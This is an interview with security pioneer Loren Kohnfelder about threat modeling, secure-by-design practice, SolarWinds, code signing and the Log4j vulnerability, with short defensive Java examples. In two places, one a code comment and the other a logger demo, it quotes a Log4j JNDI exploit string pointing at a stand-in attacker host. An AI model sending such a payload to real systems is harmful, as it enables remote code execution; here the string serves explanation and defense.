Redesigning Security with Living Legend Loren Kohnfelder


This month, we continue our Author Spotlight series with an in-depth interview of Loren Kohnfelder—a true icon in the security realm, as well as the author of Designing Secure Software. In the following Q&A, we talk with him about the everlasting usefulness of threat modeling, why APIs are plagued by security issues, the unsolved mysteries of the SolarWinds hack, and what the recent Log4j exploit teaches us about the importance of prioritizing security design reviews.


Loren Kohnfelder is a highly influential veteran of the security industry, with over 20 years of experience working for companies such as Google and Microsoft—where he program-managed the .NET Framework. At Google, he was a founding member of the Privacy team, performing numerous security design reviews of large-scale commercial platforms and systems. Now retired and based in Hawaii, Loren expands upon his extraordinary contributions to security in his new book, which details his personal perspective on technology (also found on his blog), timeless insights on building software that's secure by design, and real-world guidance for non-security experts.


No Starch Press: Aloha, Loren! We can’t talk about your new book without acknowledging the colossal impact your security work has had over the past five decades. For one, in your 1978 MIT thesis you invented Public Key Infrastructure (PKI), introducing the concepts of certificates, CRLs, and the model of trust underlying the entire freaking internet. You were also part of the Microsoft team that first applied threat modeling at scale, you co-developed the STRIDE threat-identification model (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of service, and Elevation of privilege), and you helped bake security-design reviews into the development process at Google—all of which are key milestones in the evolution of software security.

Speaking of STRIDE, there are a lot of software professionals using the methodology who weren’t even born when you and Praerit Garg invented it in the late ’90s. It’s pretty remarkable that something that originated in the era of desktop computing remains just as relevant in the age of cloud, mobile, and the web. Why do you think it continues to be so effective and seemingly immune to obsolescence?

Loren Kohnfelder: Aloha, Jen! STRIDE turned 23 this month, and the software landscape today is unrecognizable by comparison. Yet, the fundamentals of threat modeling are just as relevant as ever. I think that STRIDE's enduring value is due to its simplicity as an expression of very fundamental threats.

Since those early days, we have gained pervasive internet connectivity, exponential growth in compute power and storage, and cloud computing, and software itself has become vastly more complex. All of these changes have expanded the attack surface, and our greater reliance on digital systems, along with the massive amounts of data in the world, only increases attackers' motivation. For all of these reasons, threat modeling is more important than ever to gain a proactive view of the threat landscape for the best chance of designing, developing, and deploying a secure system.

It's important to note as well that STRIDE never purported to cover every threat software needs to be concerned with, especially now that we have IoT, robots, and self-driving cars that act directly in the world, introducing new potential forms of harm. For applications beyond traditional information processing, it's critical to consider other possible threats for systems interacting with people and machines in powerful ways.

 

NSP: It’s normal for management to tap external security experts to ensure that tech products and systems are safe to deploy—often via a security review prior to release. An essential premise of your book rejects this standard in favor of moving security to the left. What’s wrong with the status quo, why is security by design better for the bottom line, and… are you ever worried that an angry mob of out-of-work security consultants might show up at your door?

LK: No worries at all that software security will be totally solved anytime soon, so there will continue to be strong demand for good minds defending our systems. This is the most challenging topic covered in the book, and my research included discussions with friends doing just that kind of work.

Rather than “reject,” I would say that I'm recommending moving left "in addition to." Here's what I wrote in the book (p. 235) on this: "Specialist consultants should supplement solid in-house security understanding and well-grounded practice, rather than being called in to carry the security burden alone." I don't think that any security consultant has ever concluded a review by saying, "I think I found the last vulnerability in the system!" So let's try to give them more secure software to review in the first place. The two approaches needn't be an either-or decision: the challenge is finding a good balance combining both.

Honestly, I think the experts will appreciate reviewing well-designed systems without low-hanging fruit, so they can really demonstrate their chops by finding the more subtle flaws. In addition, solid design and review documents will provide a very useful map guiding their investigations compared to confronting a mass of code.

 

NSP: A point you make in the book is that “software security is at once a logical practice and an art form, one based on intuitive decision making.” This represents a paradigm shift for most developers, who tend to focus on “typical” use cases during the design phase—in other words, they presume the end product will be used as intended. You propose that they should actually be doing the opposite, that having a “security mindset” means looking at software and systems the way an attacker would. For those daunted by the prospect, can you explain what this means in practice?

LK: You have put your finger on the specific stretch that I'm inviting developers to make, and while the security mindset is a new perspective, I would say that it's more subtle than difficult. Having a security mindset involves seeing how unexpected actions might have surprising outcomes, such as realizing that a paperclip can be bent into a lockpick to open a tumbler lock. Another example from the book is a softball team deviously named "No Game Scheduled"—when the schedule was printed, other teams assumed the name meant that they had a bye, and therefore didn't show, forfeiting the game.

Again, this is a different viewpoint worth considering in addition to, not instead of, the usual. To help people new to the topic, the book is filled with all kinds of stories and basic examples that illustrate how attackers exploit obscure bugs. Malicious attacks on major systems regularly make the news, and we can decide to anticipate these eventualities throughout the development cycle, or not. It's worth adding that while security pros might be more fluent in the security mindset, the software team members are the ones who know the code inside and out, so with a little practice they are better positioned to identify these potential vulnerabilities.

 

NSP: Let’s talk about the bigger picture for a moment. We’re barely two years out from SolarWinds—one of the most effective cyber-espionage campaigns in history, where a routine software update launched an attack of epic proportions. If anything, it showed that threat actors know exactly how tech companies operate. Not to mention, the malicious code used in the attack was designed to be injected into the platform without arousing the suspicion of the development and build teams, which makes it all the more scary. If you could prescribe an industry-wide approach to preventing similar attacks in the future, what would it be?

LK: SolarWinds was a very sophisticated attack on a complex product, and the public information I've found doesn't provide a complete picture of what actually happened. So my response here is based on a high-level take, not any specifics. First, I'd say that reliance on products like this, which are given broad administrative rights across large systems, puts a lot of high-value eggs in one basket.

I would love to see a detailed design document for the SolarWinds Orion product: did they anticipate potential threats (like what happened), and if so, what mitigations were built in? Publishing designs as a standard practice would give potential customers something substantial to evaluate, to see for themselves what risks products foresee and how they are mitigated. And when this kind of breach occurs, the design serves to guide analysis of events so we can learn how to do better in the future.

NSP: The massive scope of the SolarWinds incident—affecting dozens of companies and federal agencies—was made possible by the use of compromised X.509 certificates and PKI, in that attackers managed to distribute SUNBURST malware using software updates with valid digital signatures. Back in your time at MIT, you became known for defining PKI; today there’s an implication that code signed by software publishers is trustworthy, but in light of SolarWinds this no longer appears to be a safe assumption. Is there a solution to this on the horizon?

LK: I don't think it's possible to "fix" that, because it boils down to trust in the signing party and their competence. For example, if we are signing a contract and a lawyer uses sleight-of-hand to substitute a fraudulent version, I can be deceived into providing a valid legal signature. I don't know exactly what happened at SolarWinds, but they are the ones ultimately responsible for their code-signing key. In hindsight, I wonder if they fully realized how attractive their product could be to a sophisticated threat actor, and if they took the necessary precautions against that—which would be considerable. (For the record, I was not involved in the creation of the X.509 specification.)

Generally speaking, code signing is problematic because if vulnerabilities are found later, the signature remains valid—even though the code is known to be unsafe and no longer trustworthy. Administrators must go beyond checking for valid signatures and also confirm that code is the latest available version before trusting it, and of course promptly install future updates that fix critical issues.
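To make that concrete, here is a minimal Java sketch (mine, not from the book) of what going beyond the signature check might look like. The publisher key, file paths, and version strings are hypothetical placeholders, not any real product's update mechanism.

import java.nio.file.Files;
import java.nio.file.Path;
import java.security.PublicKey;
import java.security.Signature;

public class UpdateVerifier {
    // A valid signature only proves who published the code, not that the
    // code is safe: older signed builds with known vulnerabilities still
    // verify, so we also require the latest known-good version.
    public static boolean isTrustworthy(Path artifact, Path detachedSig,
                                        PublicKey publisherKey,
                                        String artifactVersion,
                                        String latestKnownGoodVersion)
            throws Exception {
        // Step 1: verify the publisher's signature over the artifact bytes.
        Signature verifier = Signature.getInstance("SHA256withRSA");
        verifier.initVerify(publisherKey);
        verifier.update(Files.readAllBytes(artifact));
        boolean signatureValid = verifier.verify(Files.readAllBytes(detachedSig));

        // Step 2: reject stale versions even when they are correctly signed.
        boolean upToDate = artifactVersion.equals(latestKnownGoodVersion);

        return signatureValid && upToDate;
    }
}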

 

NSP: On that note, the concept of “good enough security” is predicated on the belief that the threat landscape is somehow static. One thing you really stress in the book is the importance of understanding the full range of potential threats to information systems—and that means accepting that there are adversaries out there whose capabilities exceed the current standards software developers abide by. How can dev and ops teams work together to implement security measures that not only address what is known, but also deal with threats as they evolve over time, so they can stay a step ahead of persistent adversaries?

LK: Just as you say, broad and deep threat-awareness is important as a starting point, and then the really hard part is choosing mitigations and ensuring that they do the job intended. This is a subjective process, and if you really want to stay ahead, as you say, that usually means aggressively mitigating just about every threat that you can identify, so as not to be blindsided.

Excellent point about the dangers of treating the threat landscape as static, and this is also a strong argument for moving left—because the more mitigation you work into the design, the better. (Plus, as the environment evolves, it's very hard to go back to the design for a redo!)

 

NSP: It’s common knowledge that “all software has bugs,” and that a subset of those bugs will be exploitable—ergo, the challenge of secure coding essentially amounts to not introducing flaws that become exploitable vulnerabilities. Seems easy enough! But programmers are only human, and while many of them make the effort to build protection mechanisms into, say, the features of their APIs, what are some everyday programming pitfalls you see as the root causes of most security failings?

LK: While “all software has bugs” is generally accepted as true, too often I think the connection to vulnerabilities is under-recognized. Instead, it's easy to rationalize lower quality standards since the end product will have bugs anyway. Part III of the book covers many of these common pitfalls in a little over 100 pages, so I won't attempt to summarize all that here.

If your question about root causes goes deeper, asking why programming languages and APIs are so prone to security problems, then I would say it's often simply because the practice of software development predates much awareness of security. For example, the C language has been profoundly influential, and it's still widely used, but it also gave us arithmetic overflow and buffer overruns. The inventors surely knew about these potential flaws but had no way to imagine the 2022 digital ecosystem and threats like ransomware. The same goes for APIs, which can fail to anticipate evolving threats and, once distributed, are very hard to fix later.
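Arithmetic overflow, incidentally, isn't confined to C. As a quick hypothetical sketch (my illustration, not an example from the book), Java's int silently wraps around too, and Math.addExact is one defensive alternative:

public class OverflowDemo {
    public static void main(String[] args) {
        int total = Integer.MAX_VALUE;

        // Silent wraparound: 2147483647 + 1 becomes -2147483648, the kind
        // of quiet arithmetic bug that can corrupt a size or length check.
        System.out.println(total + 1);

        // Math.addExact throws ArithmeticException on overflow
        // instead of wrapping, making the failure visible.
        try {
            System.out.println(Math.addExact(total, 1));
        } catch (ArithmeticException e) {
            System.out.println("overflow detected: " + e.getMessage());
        }
    }
}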

Another common cause in API design is failing to present a clean interface in terms of trust relationships and security responsibilities. API providers naturally want to offer lots of features and options, yet this makes the interface complicated to use. Since the implementation behind the API is typically opaque to the caller, it's easy for a mistake to arise. So it's imperative for API documentation to provide clear security commitments, or to detail exactly what precautions callers must take and why. Log4j is a perfect example of this problem: surely most applications reasonably assumed it was safe to log untrusted inputs, but the JNDI feature—which they may not even have been aware of—offered attackers an attractive point of entry.
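A minimal sketch shows how innocuous that pitfall looks in practice (hypothetical code, not from the book): on Log4j 2 releases vulnerable to CVE-2021-44228, logging an attacker-controlled string could trigger a remote JNDI lookup.

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginHandler {
    private static final Logger logger = LogManager.getLogger(LoginHandler.class);

    // userAgent is attacker-controlled input taken from an HTTP header.
    public void recordLogin(String user, String userAgent) {
        // This looks like responsible monitoring of an internet-facing
        // interface, but on vulnerable Log4j 2 versions a payload such as
        // "${jndi:ldap://attacker.example/a}" in the logged message could
        // cause a remote lookup and ultimately remote code execution.
        logger.info("login for {} with agent {}", user, userAgent);
    }
}

The caller had no reason to expect the logging library to interpret message contents at all; that is exactly the kind of unclear security contract described above.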

 

NSP: Since you brought it up, and it sort of ties together everything we’ve been discussing, let’s talk about that Apache Log4j zero-day vulnerability (which continues to make headlines). Here we have a Java-based logging library, used by millions of applications, with a critical flaw described as basically “trivial” to exploit. Why is this bug considered so incredibly severe? And, even though your book was released before the issue was discovered, are there any nuggets of wisdom in it that address this type of issue—or that could help software developers solve the problems that led to it?

LK: Log4j could be the poster child for the importance of security design reviews. Much has been written already by folks who have examined this extensively, but clearly allowing LDAP access via JNDI was a design flaw. Whether the designers failed to recognize the threat, mitigated it insufficiently, or simply didn't understand the consequences is hard to say without a design document (much less a review). Skipping secure design and review means missing the best opportunities to catch exactly this sort of vulnerability before it ever gets released in the first place.

This vulnerability is nearly a perfect storm because of a combination of factors: it allows remote code execution (RCE) attacks, the vulnerable code is very widely used by Java applications, and as a logging utility it's often exposed to the attack surface. That last point deserves elaboration: attackers often poke at internet-facing interfaces using malformed inputs in hopes of triggering a bug that might be a vulnerability; and developers want to monitor the use of these interfaces, so they log the untrusted input, creating a direct connection to the vulnerable code in Log4j. It so happens that the book includes an example design document for a simple logging system (Appendix A), and that API explicitly uses structured data (as JSON) rather than the strings with escape sequences that got Log4j into trouble.
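The structured-data idea is easy to picture: treat untrusted input strictly as data that nothing downstream will interpret. Here is a minimal sketch of that principle (my illustration, assuming the Jackson library, and not the book's actual design):

import java.util.Map;
import com.fasterxml.jackson.databind.ObjectMapper;

public class StructuredLogger {
    private static final ObjectMapper mapper = new ObjectMapper();

    // Emit one log record as a JSON object. Untrusted values are
    // JSON-encoded data; there is no format string or escape sequence
    // for a payload to exploit downstream.
    public static String record(String event, Map<String, String> fields)
            throws Exception {
        return mapper.writeValueAsString(Map.of("event", event, "fields", fields));
    }

    public static void main(String[] args) throws Exception {
        // Even a hostile-looking value comes out as an inert JSON string.
        System.out.println(record("login",
                Map.of("agent", "${jndi:ldap://attacker.example/a}")));
    }
}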

Furthermore, threat modeling and secure software design should have informed all applications using Log4j of the risks involved in logging untrusted inputs. In the book's Afterword, I write about using software bills of materials (which would have identified which applications use Log4j), and the importance of promptly updating dependencies (in this case, the slow response to Log4j is why it's still in the news), just to name a few additional mitigations that would help. (I posted about Log4j at more length last year when it first became public.)

NSP: Wow, Loren—maybe you should come out of retirement! At the very least, Designing Secure Software should be required reading for everyone in the field, and it’s clearly becoming more urgent with every passing day.

LK: Thanks for your kind words and this opportunity to reflect on current events. The book is my way of stepping out of retirement to share what I've learned in hopes of nudging the industry in some good new directions. I certainly recognize that investing security effort from the design stage runs counter to a lot of prevailing practice, but I've seen it practiced to good effect, and now there's a manual available if anyone wants to try the methodology.

I think that our discussion nicely shows the value of moving beyond reactive security, moving left to be more proactive. The book offers lots of actionable ideas, and it's written for a broad software audience so we can get more developers as well as management, interface designers, and other stakeholders all involved. No doubt security lapses will continue to occur—but when they do, we need more transparency to fully understand exactly what happened and how best to respond, and then to take those learnings and institute the changes necessary to improve in the future.